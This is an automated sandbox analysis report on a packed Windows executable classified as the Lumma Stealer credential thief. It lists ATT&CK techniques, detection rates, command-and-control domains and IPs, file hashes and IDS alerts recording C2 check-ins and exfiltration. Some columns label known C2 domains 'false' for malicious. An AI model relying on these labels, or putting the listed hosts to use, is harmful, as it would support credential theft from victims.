                Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 44 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 4 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 223 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

                Source | Detection | Scanner | Label
                3LUyRfIoKs.exe | 60% | Virustotal |
                3LUyRfIoKs.exe | 66% | ReversingLabs | Win32.Trojan.CryptBot
                3LUyRfIoKs.exe | 100% | Avira | TR/Crypt.XPACK.Gen
                3LUyRfIoKs.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                https://bridge.sfon | 0% | Avira URL Cloud | safe
                http://store.steampowered | 0% | Avira URL Cloud | safe
                https://cdn.fastly. | 0% | Avira URL Cloud | safe
                https://lev-tolstoi.com/ta | 100% | Avira URL Cloud | malware
                https://login.s | 0% | Avira URL Cloud | safe
                https://lev-tolstoi.com:443/apil | 100% | Avira URL Cloud | malware
                https://bridge.sfo1.ap01.n | 0% | Avira URL Cloud | safe
                https://checkout.steampow | 0% | Avira URL Cloud | safe
                https://login.steamp | 0% | Avira URL Cloud | safe
                https://lev-tolstoi.com/apix | 100% | Avira URL Cloud | malware
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                steamcommunity.com | 23.55.153.106 | true | false | | high
                lev-tolstoi.com | 104.21.66.86 | true | false | | high
                cashfuzysao.buzz | unknown | unknown | false | | high
                scentniej.buzz | unknown | unknown | false | | high
                inherineau.buzz | unknown | unknown | false | | high
                prisonyfork.buzz | unknown | unknown | false | | high
                rebuildeso.buzz | unknown | unknown | false | | high
                appliacnesot.buzz | unknown | unknown | false | | high
                hummskitnj.buzz | unknown | unknown | false | | high
                mindhandru.buzz | unknown | unknown | false | | high
                screwamusresz.buzz | unknown | unknown | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                scentniej.buzz | false | | high
                https://steamcommunity.com/profiles/76561199724331900 | false | | high
                rebuildeso.buzz | false | | high
                appliacnesot.buzz | false | | high
                screwamusresz.buzz | false | | high
                cashfuzysao.buzz | false | | high
                inherineau.buzz | false | | high
                https://lev-tolstoi.com/api | false | | high
                hummskitnj.buzz | false | | high
                mindhandru.buzz | false | | high
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                      high
                                                                                                                                                                      https://www.google.com/recr3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294833870.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://checkout.steampow3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://help.steampowered.com/en/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://steamcommunity.com/market/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://store.steampowered.com/news/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi3LUyRfIoKs.exe, 00000000.00000003.2242105573.0000000005A79000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192897595.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192897595.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://recaptcha.net/recaptcha/;3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://lev-tolstoi.com/apix3LUyRfIoKs.exe, 00000000.00000003.2294710528.00000000013FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://login.steamp3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://steamcommunity.com/discussions/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://store.steampowered.com/pr3LUyRfIoKs.exe, 00000000.00000003.2268452542.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268860714.00000000013F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://store.steampowered.com/stats/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://medal.tv3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://broadcast.st.dl.eccdnx.com3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://steamcommunity.com/li3LUyRfIoKs.exe, 00000000.00000003.2269185340.0000000001396000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://x1.c.lencr.org/03LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://x1.i.lencr.org/03LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319003LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620163LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
IP              Domain               Country         ASN     ASN Name          Malicious
104.21.66.86    lev-tolstoi.com      United States   13335   CLOUDFLARENETUS   false
23.55.153.106   steamcommunity.com   United States   20940   AKAMAI-ASN1EU     false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581617
Start date and time: 2024-12-28 09:55:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 3LUyRfIoKs.exe
renamed because original name is a hash value
Original Sample Name: e17baab743930b14a8d9a54086f091d6.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          03:56:23API Interceptor17x Sleep call for process: 3LUyRfIoKs.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                              H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              N36e6JFEp6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.952228277100867
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 3LUyRfIoKs.exe
File size: 1'836'544 bytes
MD5: e17baab743930b14a8d9a54086f091d6
SHA1: 7eed52a4f370c7dc47ac8e4a7ea04a16fafd5993
SHA256: 315aee541b7f4d32b0fa71932e9227aa3ef1667856d5dc35c97bf1434e2ae31c
SHA512: d6fc974855beacc7b3605ef0c99aac5879be9a208ce69b7af941d715343fbf7be2ab0df5c345c67a2a56f614d3279d1b48be66030e4bf73d454843d8634d2f68
SSDEEP: 49152:fAPsGokjs9oS7M9sG3Ve+a1Tn102BcjkDMXp:fSsGoBw9sUVOTn1/uQDM5
TLSH: 4885334DA7BF0647C64041B4636EACA8C3F05B27366963A6E25D3069C9CB3C5B8C4F6D
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................H...........@...........................H.....V.....@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x889000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
                                                                                                                                                                                                                                              push edx
                                                                                                                                                                                                                                              insb
                                                                                                                                                                                                                                              js 00007F2830C5B951h
                                                                                                                                                                                                                                              outsb
                                                                                                                                                                                                                                              inc ecx
                                                                                                                                                                                                                                              jno 00007F2830C5B932h
                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                                              pop edx
                                                                                                                                                                                                                                              xor eax, dword ptr [ebx+36h]
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              aaa
                                                                                                                                                                                                                                              imul edx, dword ptr [ebx+58h], 4Eh
                                                                                                                                                                                                                                              aaa
                                                                                                                                                                                                                                              inc ebx
                                                                                                                                                                                                                                              jbe 00007F2830C5B92Ch
                                                                                                                                                                                                                                              dec ebx
                                                                                                                                                                                                                                              js 00007F2830C5B923h
                                                                                                                                                                                                                                              jne 00007F2830C5B911h
                                                                                                                                                                                                                                              push esp
                                                                                                                                                                                                                                              inc bp
                                                                                                                                                                                                                                              outsb
                                                                                                                                                                                                                                              inc edx
                                                                                                                                                                                                                                              popad
                                                                                                                                                                                                                                              dec ebx
                                                                                                                                                                                                                                              insd
                                                                                                                                                                                                                                              dec ebp
                                                                                                                                                                                                                                              inc edi
                                                                                                                                                                                                                                              xor dword ptr [ecx+36h], esp
                                                                                                                                                                                                                                              push 0000004Bh
                                                                                                                                                                                                                                              sub eax, dword ptr [ebp+33h]
                                                                                                                                                                                                                                              jp 00007F2830C5B93Ch
                                                                                                                                                                                                                                              dec edx
                                                                                                                                                                                                                                              xor bh, byte ptr [edx+56h]
                                                                                                                                                                                                                                              bound eax, dword ptr [edi+66h]
                                                                                                                                                                                                                                              jbe 00007F2830C5B91Ah
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              or eax, 506C720Ah
                                                                                                                                                                                                                                              aaa
                                                                                                                                                                                                                                              xor dword ptr fs:[ebp+62h], ecx
                                                                                                                                                                                                                                              arpl word ptr [esi], si
                                                                                                                                                                                                                                              inc esp
                                                                                                                                                                                                                                              jo 00007F2830C5B953h
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x1ac | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x52000 | 0x26400 | d32e931c4549c2a67bae3dffe927b27b | False | 0.9996361825980392 | data | 7.987306923457494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x53000 | 0x1ac | 0x200 | c4249243ceaeb236e3ce8ce2ab2c9a69 | False | 0.5390625 | data | 5.249019796122045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x55000 | 0x29c000 | 0x200 | 92148153a18e7fb8ed312911620c0a81 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| keznjtty | 0x2f1000 | 0x197000 | 0x196600 | f8ea3f2388ba415c8d299fe184a6d996 | False | 0.9945888044063365 | data | 7.953745081857698 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| slutevoy | 0x488000 | 0x1000 | 0x400 | e13e795d3cdf56ecb24d4bb1399441af | False | 0.7734375 | data | 6.087934491784486 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x489000 | 0x3000 | 0x2200 | 1e5345e7247ecf532e42b16e7203bdf3 | False | 0.39246323529411764 | DOS executable (COM) | 4.110825112855058 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_MANIFEST | 0x53058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |

| DLL | Import |
| kernel32.dll | lstrcpy |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2024-12-28T09:56:24.893279+0100 | 2058582 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) | 1 | 192.168.2.5 | 61254 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:56:25.050344+0100 | 2058584 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) | 1 | 192.168.2.5 | 60754 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:56:25.192961+0100 | 2058586 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) | 1 | 192.168.2.5 | 57484 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:56:25.335802+0100 | 2058588 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) | 1 | 192.168.2.5 | 61960 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:56:25.477482+0100 | 2058580 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) | 1 | 192.168.2.5 | 64150 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:56:25.618979+0100 | 2058590 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) | 1 | 192.168.2.5 | 56657 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:56:25.766927+0100 | 2058572 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) | 1 | 192.168.2.5 | 64200 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:56:25.911826+0100 | 2058576 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) | 1 | 192.168.2.5 | 53592 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:56:26.054370+0100 | 2058578 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) | 1 | 192.168.2.5 | 57910 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:56:27.833768+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP |
| 2024-12-28T09:56:28.598026+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP |
| 2024-12-28T09:56:30.264241+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP |
| 2024-12-28T09:56:30.996564+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP |
| 2024-12-28T09:56:30.996564+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP |
| 2024-12-28T09:56:32.278763+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP |
| 2024-12-28T09:56:33.056715+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP |
| 2024-12-28T09:56:33.056715+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP |
| 2024-12-28T09:56:34.845788+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49707 | 104.21.66.86 | 443 | TCP |
| 2024-12-28T09:56:37.157974+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | TCP |
| 2024-12-28T09:56:39.507854+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49710 | 104.21.66.86 | 443 | TCP |
| 2024-12-28T09:56:42.555579+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49719 | 104.21.66.86 | 443 | TCP |
| 2024-12-28T09:56:43.351379+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49719 | 104.21.66.86 | 443 | TCP |
